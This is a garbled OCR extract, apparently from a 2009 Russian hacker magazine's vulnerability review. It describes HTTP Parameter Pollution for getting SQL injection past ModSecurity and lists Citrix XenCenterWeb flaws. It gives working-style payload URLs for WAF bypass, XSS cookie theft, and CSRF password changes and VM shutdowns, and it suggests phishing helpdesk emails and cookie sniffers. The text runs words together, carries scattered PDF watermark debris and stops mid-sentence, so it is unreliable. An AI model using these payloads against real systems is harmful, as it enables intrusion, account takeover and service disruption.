BRIEF ЗнаменитыйWebApp-firewall терпитбедствие. Какизвестно, это модульApache соспециальноподключенныминаборамиправил(Core

Rules), защищающимиоттипичныхатакнаWEB-приложения. Из-за спецификиобработкиcookie вGET/POST-запросахсостороныASP. NET существуетвозможностьобойтиограниченияMod_Security. Когда многочисленныепараметры«куков» одногоитогожеименивстречаются вHTTP-запросе, тоASP/ASP.NET-приложениярасцениваютихкак«кол- лекциюобъектов». Прощеговоря, считаютэлементамимассива.

EXPLOIT Кпримеру, мыпроизводимSQL-injection:

http://example.com/search.aspx?value=select 1,2,3 from table

Всенормально, приэтомотнасулетелзапросвида:

POST /index.aspx?a=1&a=2 Host: www.example.com Cookie: a=5; a=6 Content-Length: 7 a=3&a=4

Насервернойсторонеэтотзапросинтерпретируетсяследующимобразом:

ModSecurity:

value = select 1,2,3 from table

Web Application Interpretation:

value = select 1,2,3 from table

Делаемтеперьтак:

http://example.com/search.aspx?value=select 1&value=2,3 from table

ModSecurity:

value = select 1

XÀÊÅÐ 09 /129/ 09

047

				hang		e
			C			e	E
		X					E
	-							d
	F							t
	D							i
	D							r
P						NOW!		o
P

				to	BUY					ВЗЛОМ
w Click									m
w
	w							o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

УЯЗВИМЫЙ ФРАГМЕНТКОДА!

КОДУЯЗВИМОЙПРОЦЕДУРЫ ВNAGIOS

value = 2,3 from table Web Application:

value select 1,2,3 from table

Интересно, правда? Экспериментымогутпродолжатьсядобесконечности:

http://example.com/search.aspx?value=select/*&value=*/

1,2,3/*&value=*/from/*&value=*/table

ModSecurity:

value=select/*

value=*/1,2,3/*

value=*/from/*

value=*/table Web Application:

value = select/*,*/1,2,3/*,*/from/*,*/table

ОченьчастотакойприемможетбытьиспользованприобходеMod_ Security. ТерминHTTP Polution былвведенLuca Carettoni иStefano di Paola ипредставленнанедавнопрошедшейконференцииOWASP

AppSec EU09 Poland. Вработе«Split and Join» (lavakumar.com/Split_ and_Join.pdf) Lavakumar Kuppan осветилвозможностьэксплуатации уязвимостинапримереWAF. Ранееуязвимостьужеиспользоваласьв работахдругихsecurity-ресечеров, например, длянаписанияэксплойта подDFLabs PTK (http://seclists.org/bugtraq/2008/Nov/0038.html). HTTP Parameter Polution — один из явных способов обхода WAF (Web Application Firewall).

Параметрами любого HTTP-запроса являются пары (словарь

— ключ + значение), разделенные символом «=». Границы параметров, в свою очередь, определяются с помощью символов «&» и «;», но беда в том, что тот же стандарт не запрещает многократное использование одинаковых имен в HTTP-запро- сах. В связи с особенностями восприятия на стороне ПО описанных выше запросов возможно нарушение логики работы WEB-приложений и появление способов эксплуатации многих уязвимостей.

TARGETS ModSecurity <= 2.5.9 снаборомправилModSecurity Core Rules v 2.5-1.6.1.

SOLUTION Наданныймоментустранениеуязвимостиотсутствует.

03МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИВCITRIX XENCENTERWEB

BRIEF ГрафическийфронтендкCitrix XenServer позволяетвизуально управлятьтвоимивиртуальнымимашинамивпулересурсов, предприниматьразличныедействиявродеостановаилиперезапуска, всячески рулитьпользовательскимиотношениямииещемногочем.

EXPLOIT Кактакового, одногоэксплойтаздесьненарисуешь— найден целыйрядбрешейвбезопасности:

1)XSS — межсайтовыйскриптинг.

https://xencenterweb.loc/config/edituser.php?username=

1<script>alert(document.cookie)</script>

Грамотносоставленноеписьмоотдоверенноголицаhelpdesk’aсыграетсвою рольсэтойбагой.Вкачествесниферадляловликукисовможноиспользовать существующийсофтKanickSnifferилионлайн-сервис(Antichat.ru).

2)CSRF—Cross-SiteRequestForgery. CSRFрасшифровываетсякак

Cross-SiteRequestForgery(«Межсайтоваяподделказапроса»).Этоттипатак направленнаимитированиезапросапользователякстороннемусайту.Уяз- вимостьдостаточноширокораспространенаиз-заособенностейархитектуры большинствавеб-приложений.Аименно—из-затого,чтомногиевеб-прило- жениянечеткоопределяют,действительнолизапроссформированнастоящим пользователем.Такиеситуациичастовстречаютсятам,гдеестьединственное средствораспознаванияклиента—cookiesилисессия(ну,иногдаещеreferer). Соответственно,еслиспомощьюопределенногокодазаставитьбраузеротправитьнужныйнамзапроснастороннийсайт,тозапросможетвполненормально пройтидажектемскриптам,вкоторыхнужнаавторизация—ведьбраузерпри запросахксайтуотправляетемуиcookies.Главное,чтобыпользовательзаранеебылавторизирован.Порой,проявивсмекалку,стакойуязвимостьюможно творитьчудеса(наНовыйГоддвафранцузскиххакерарулиливключениеми отключениемогнейнацентральнойновогоднейелке).

Неавторизированная смена пароля: https://xencenterweb.loc/config/changepw. php?username=[victim_username]&newpass=[attacker’s_ chosen_pwd]

Выключение конкретной виртуальной машины: https://xencenterweb.loc/hardstopvm.php?stop_ vmref=[VMref]&stop_vmname=[VMname]

Blind SQL Injection — проведение слепой инъекции, ис-

048		XÀÊÅÐ 09 /129/ 09

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202414.76 Mб12124_Optimized.pdf
#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf